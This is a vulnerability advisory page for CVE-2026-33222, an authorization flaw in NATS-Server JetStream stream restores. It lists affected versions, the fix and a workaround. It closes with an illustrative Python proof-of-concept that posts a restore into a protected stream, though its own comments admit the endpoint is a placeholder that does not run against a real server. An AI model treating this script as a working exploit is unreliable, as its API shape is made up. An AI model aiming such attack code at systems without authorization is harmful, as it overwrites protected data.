Security Vulnerability Report
CVE-2026-33222 CVSS 4.9 MEDIUM


Published: 2026-03-25 21:16:47
Last Modified: 2026-03-26 17:17:39

Description

NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, users with JetStream admin API access to restore one stream could restore to other stream names, impacting data which should have been protected against them. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, if developers have configured users to have limited JetStream restore permissions, temporarily remove those permissions.

CVSS Details

CVSS Score: 4.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N
Weakness: CWE-285 (Improper Authorization)

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* - VULNERABLE (NATS-Server < 2.11.15)
cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* - VULNERABLE (NATS-Server >= 2.12.0 and < 2.12.6)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC Concept for CVE-2026-33222
# This script demonstrates the logic flaw where a user with restore permissions
# can restore data to an arbitrary stream name.
# Note: the HTTP endpoint and payload below are illustrative placeholders only;
# the real JetStream admin API is carried over NATS subjects under $JS.API,
# not over an HTTP endpoint, so this script does not run against a real server.
import requests
import json

# Configuration
NATS_API_URL = "http://target-nats-server:8222/js/v1/stream"
AUTH_HEADER = {"Authorization": "Bearer <attacker_jwt_token>"}

# Legitimate source stream the attacker has access to
source_stream = "ATTACKER_OWNED_STREAM"
# Target stream the attacker wants to overwrite (Impacted data)
target_stream = "PROTECTED_TARGET_STREAM"

# Payload to restore data (Simulating the API call structure)
payload = {
    "stream_name": target_stream,  # Vulnerability: The target is not validated against permissions
    "restore_action": "full_restore",
    "source": source_stream,
}

print(f"[*] Attempting to restore data from '{source_stream}' to restricted stream '{target_stream}'...")

try:
    # The endpoint might differ depending on specific NATS configuration
    response = requests.post(
        f"{NATS_API_URL}/{source_stream}/restore",
        headers=AUTH_HEADER,
        json=payload,
    )
    if response.status_code == 200:
        print("[+] Exploit successful! Data restored to unauthorized stream.")
        print(f"[+] Response: {response.json()}")
    else:
        print(f"[-] Request failed (Status: {response.status_code})")
        print(f"[-] Response: {response.text}")
except Exception as e:
    print(f"[!] Error during exploit execution: {e}")
```

References

https://advisories.nats.io/CVE/secnote-2026-12.txt (Vendor Advisory, Mitigation)
https://github.com/nats-io/nats-server/security/advisories/GHSA-9983-vrx2-fg9c (Vendor Advisory, Mitigation)